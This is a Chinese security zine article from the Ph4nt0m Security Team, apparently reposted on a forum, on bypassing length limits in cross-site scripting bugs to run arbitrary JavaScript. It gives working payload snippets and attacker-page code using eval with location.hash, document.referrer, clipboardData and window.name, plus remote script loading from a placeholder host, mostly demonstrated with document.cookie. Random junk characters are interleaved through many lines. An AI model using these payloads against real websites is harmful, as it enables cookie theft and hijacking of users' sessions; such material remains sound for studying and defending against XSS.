[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==
2 J) S% z" ^: U0 r
# H: S5 o* @$ v$ o! ?' O                       Issue 0x03, Phile #0x04 of 0x07
/ i2 d( e' L( [3 _( R, X

  ?: @, z2 ^4 a5 }1 R|=---------------------------------------------------------------------------=|
|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
# w5 ~' D4 e  g+ O4 v|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
' S: Q: r- `% T- w  e+ w|=------------------------=[      By luoluo     ]=---------------------------=|
|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
& z: Y: i# V3 r3 L; T; ~|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
|=---------------------------------------------------------------------------=|


7 ]3 d. F# q: ]5 N[目录]
* |7 F6 d2 g6 K% t7 T
1. 综述
+ }! Q8 b3 u8 x3 ^5 v! s6 n6 `: ?2. 突破方法
  2.1 利用HTML上下文中其他可以控制的数据
" `/ U% }; K7 q1 y% _  2.2 利用URL中的数据
  2.3 JS上下文的利用
2 o. {: F7 Y; d: ^' Q3 |4 ?  2.4 利用浏览器特性在跨域的页面之间传递数据
4 C7 w- L! j  W$ E6 K7 f8 h    2.4.1 document.referrer
    2.4.2 剪切板clipboardData
- e' C) b* [- f    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
3 J1 w/ P8 \: l4 r3. 后记
4. 参考
0 K% u& D; f, @6 K8 f
9 R  @+ o! z# q" E
* M7 w' @0 H6 }8 _. K2 k* }+ j一、综述

    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
/ v% T1 L; |8 P3 \" m人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
! e7 Q0 [; U# `( R* d& [极端情况下的XSS漏洞。

- c+ S' a! K3 `- e    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
据。

  K, i. K: V# p( i. Q$ r, ~3 a" o
二、突破方法
; J5 \# L+ O' R% R6 t
2.1 利用HTML上下文中其他可以控制的数据

    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
/ [) x8 \0 j+ `8 }( b5 Q7 g据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
" x* v. F1 ?4 m, J& s
--code-------------------------------------------------------------------------
<div id="x">可控的安全的数据</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------

* ~5 n' ?, N) ^4 h! C6 H4 Y    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
" y$ O9 A5 @% [: j! B8 {编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：

* T7 X) R; G: P--code-------------------------------------------------------------------------
( `/ U6 A1 \% ~5 m* |% p: {<div id="x">alert%28document.cookie%29%3B</div>
  F8 V. J2 s; O( i; ~1 B$ R, N) r<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
6 ?1 M$ W. d5 h( X+ t! Q-------------------------------------------------------------------------------
  X( v0 x% Y( i' W+ F
长度：28 + len(id)

' ]# p( L5 D5 b4 X4 I( S    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。
, {- {; c" f3 w, b. q, Z. B

' c1 P" Y1 W! U) Z3 a0 L6 U2.2 利用URL中的数据

' r) d7 h) \' t  R6 _. N/ Z    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
% x: u" D9 @% U* h! Y控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
" {. A( S8 C4 sdocument.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
最后：

- @" _/ G* Z  v7 G3 s--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)

4 V  F; H" J4 w/ k* E<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------

长度：30
+ C$ f- d) L, Z* J, @1 S
+ k6 a  Z! N9 p: C+ Y. `--code-------------------------------------------------------------------------
; u9 Q5 V% V) B* |5 W7 v( X<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
3 x+ {# y- W( H7 Q+ k* V7 k4 I4 G3 h8 Z
长度：31

    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
* _" ^' X6 X% y% Q字符：
: v) Z: N  b% d' |
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
4 T) J- {$ k, R2 V! }7 V-------------------------------------------------------------------------------
! v/ K. u) F4 x
长度：29
* L0 I# x5 d: ]* C0 I6 }
--code-------------------------------------------------------------------------
# P6 G3 t* t* s8 G<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
) }, `! c0 D" m5 G, |$ Y. ?9 j-------------------------------------------------------------------------------
* f# H/ S  C3 ?% {% ~
长度：30
7 i5 v. }6 F. R( ~/ e
9 c+ c2 O' X& D1 l    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
6 ~6 ]+ r; u2 Y' M- d有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：
# e( X* y3 U6 K* ^8 H( j; `) f
--code-------------------------------------------------------------------------
" l: M4 I8 V6 d. h; H% Jhttp://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)

( j1 k2 p9 N( N; P  r8 t6 X  I0 M<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------

长度：29

6 @6 k: d! d5 P. ^" r# c    这样比上面的例子又少了一个字符。那么还可以更短么？
4 h5 h. ^- y2 l! z
. [/ V6 e4 i$ i
9 L8 L8 Q. q. z6 _2 j2.3 JS上下文的利用

    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：

String.fromCharCode
getElementById
getElementsByTagName
document.write
XMLHTTPRequest
...
) @! f) d. W$ o( [4 R" z7 @" T
* a% |  A( p6 j    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
简化函数，最经典的例子就是：

0 A; t4 K6 s" B7 a& ]--code-------------------------------------------------------------------------
! H% }- R8 y+ [+ ^function $(id) {
        return document.getElementById(id);
2 s0 r9 d. R  }$ ^9 D2 T}
0 h% O, j+ K) u) n6 O# |-------------------------------------------------------------------------------

    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
6 O" @  E0 }( l+ C, ^* I6 {( D1 I最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：

; C6 f: P" ~, a, j4 r$ {--code-------------------------------------------------------------------------
function loads(url) {
        ...
3 C( b: U, b: O( F1 [3 ?8 H3 s6 B$ k        document.body.appendChild(script);
- t( e, n! _4 f. ?  @}
$ }9 P+ f2 E! L2 ]4 B- C# C
1 o- e4 y, d9 W  U6 P/ Z) O<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
5 t* }4 f( g' L* u' P-------------------------------------------------------------------------------
8 n3 Z4 |0 Z6 L- u2 Y" K
长度：len(函数名) + len(url) + 5

    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：

# D: \; J$ \  p, R--code-------------------------------------------------------------------------
function get(url) {
3 q8 m) r% U0 G4 x% J7 C        ...
        return x.responseText;
0 X# H  e) f0 M/ {}

& q5 G  d4 [% ?) h) R6 t<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
-------------------------------------------------------------------------------

( b2 Q" y; I5 v/ _$ ]  `长度：len(函数名) + len(url) + 11

    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：
* ]& b5 q! S0 C) S7 J$ }/ Q
: g; ?* Q* q$ Q2 x0 GJQuery
YUI
2 B5 h' E) o+ R* Z3 `  ^3 X...

! Z$ y  t. h" p5 I    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
# ^$ Q4 H  |  l: ~; H0 n们的代码，进而突破长度限制执行任意代码。
3 [; T" _: t& v1 f% s& C. m- m% y

/ W: s8 G, I: D( h3 [2.4 利用浏览器特性在跨域的页面之间传递数据

6 y$ v+ }- V2 Y0 b1 p3 Y( R6 h    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。
$ ?, m, N  o/ k  u: W
/ A0 s: ~3 z/ a# b" E2.4.1 document.referrer

# D% X8 P% p2 I: v5 q* x% A  Z    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
) ]- ]3 J/ F& }* V( z& @1 GPayload，被XSS的页面通过referrer获取相关代码执行。
) a: @, R" i  V& m! _
攻击者构造的的页面：

* ]  p9 }( M  U9 Y$ S- N--code-------------------------------------------------------------------------
" Z' ~4 l- u! ]. U7 Y4 S/ _9 qhttp://www.a.com/attack.html?...&alert(document.cookie)

/ l- c2 \. k. X1 h/ F<a href="http://www.xssedsite.com/xssed.php">go</a>
$ r0 Q6 y" l) |/ Z-------------------------------------------------------------------------------
$ d1 U* \. Z3 X1 c0 R( _  Y
被XSS的页面：

--code-------------------------------------------------------------------------
* O1 |/ L. B' M- e7 U<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
3 i: M8 K/ i1 [) s-------------------------------------------------------------------------------

2 n8 l6 s4 _! M' T/ o长度：34

    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：
! W& z8 C1 l' i/ g; o1 o( ~
: Y- ~8 j1 [. o* g/ a--code-------------------------------------------------------------------------
: S6 R+ A* K5 m9 O4 h( o9 y<script type="text/javascript">
<!--
3 C  g+ ]( r% _9 t/ d: M. nwindow.onload = function(){
        var f = document.createElement("form");
        f.setAttribute("method", "get");
        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
        document.body.appendChild(f);
" S3 {; d9 s8 i$ d8 t9 \        f.submit();
};
//-->
4 n+ J8 m( q  F* W3 o</script>
-------------------------------------------------------------------------------


0 X' ^$ b/ x" z. x3 i  _* _2.4.2 剪切板clipboardData

5 G1 S/ g4 U3 M# h4 ~' ]0 T- f    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
取并执行该数据。

8 V+ b/ B' `# K+ j攻击者构造的页面：
/ Z6 i$ Q( e. y" W7 l" Q. I
* V! N: c; L' Q9 L--code-------------------------------------------------------------------------
  x& w! p" W/ y: m6 i& `<script>
clipboardData.setData("text", "alert(document.cookie)");
5 t  b! [+ B8 k( A</script>
-------------------------------------------------------------------------------

/ H3 w) c$ Z0 D: d被XSS的页面：
! Z+ `7 a- \8 v
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
5 E3 u- X+ m3 B' D; N
长度：36

8 s5 R8 S# G+ I) K8 h( K& m    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。


* e2 C+ R# m; _% J7 r5 H7 l( b2.4.3 窗口名window.name

    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
% c* Z5 _0 d( F4 @! q# Q据的，但是这个特性本身并不是漏洞。
5 l# U" L- I3 G; c
    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
( r  [0 p* M/ b5 ]- Y! M我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
- ]: z+ m2 k* A* J& s需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
; i( T- t  @/ t: M$ ^的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
或者VBS。

    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
) t9 k5 P; l* Y2 N限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：

攻击者构造的页面：

--code-------------------------------------------------------------------------
<script>
  G: h4 ~; x3 h4 j1 swindow.name = "alert(document.cookie)";
locaton.href = "http://www.xssedsite.com/xssed.php";
9 t& X$ k* c. D/ t7 b</script>
-------------------------------------------------------------------------------
9 O" `2 e0 o* r; [4 a7 T+ d, V
1 e! |, Q+ h8 E5 {9 p被XSS的页面：

1 A6 D; E/ \, z; u: k--code-------------------------------------------------------------------------
<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
' f4 \3 B8 O& M4 u2 S8 g* k
长度：11

    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
的技巧，这个技巧的发现也是促成本文的直接原因。

! @0 i0 m+ N6 d6 `# p3 s; @; l" R5 q: b    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
章来探讨。
) Z3 Y0 ~8 _0 H& U- C( |

2.5 以上的方式结合使用
7 [- n. _/ f9 d; v8 i9 I; r$ m4 q" y
    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
* Q, h/ |+ [9 j% k中，灵活的组合上面的方法可能会起到奇效。
. ?4 f+ H& {; u/ x5 c. V

三、后记
* m$ `8 G' G  h3 I- V8 k2 ?/ }
    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
2 a8 Z* f9 g1 Z# ~: k. s8 b和我交流！
$ H2 {4 b# N- w8 V3 k+ g1 Y, n6 i) I, U
6 k0 `; a) X. Z! J$ i  w    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！
7 {" W/ T! f, U
4 H* {, L5 [3 f9 _) d    本文是纯粹的技术探讨，请勿用于非法用途！
' r$ V% O3 g- I3 C9 v+ m
. ^0 f8 S$ C/ K. e# J' e
四、参考

) n9 J1 W( X% M! ]( {7 \http://msdn.microsoft.com/en-us/library/aa155073.aspx
. q3 ~8 B+ q1 x$ H6 q- c
( S+ I! X2 M6 b7 H8 z& d-EOF-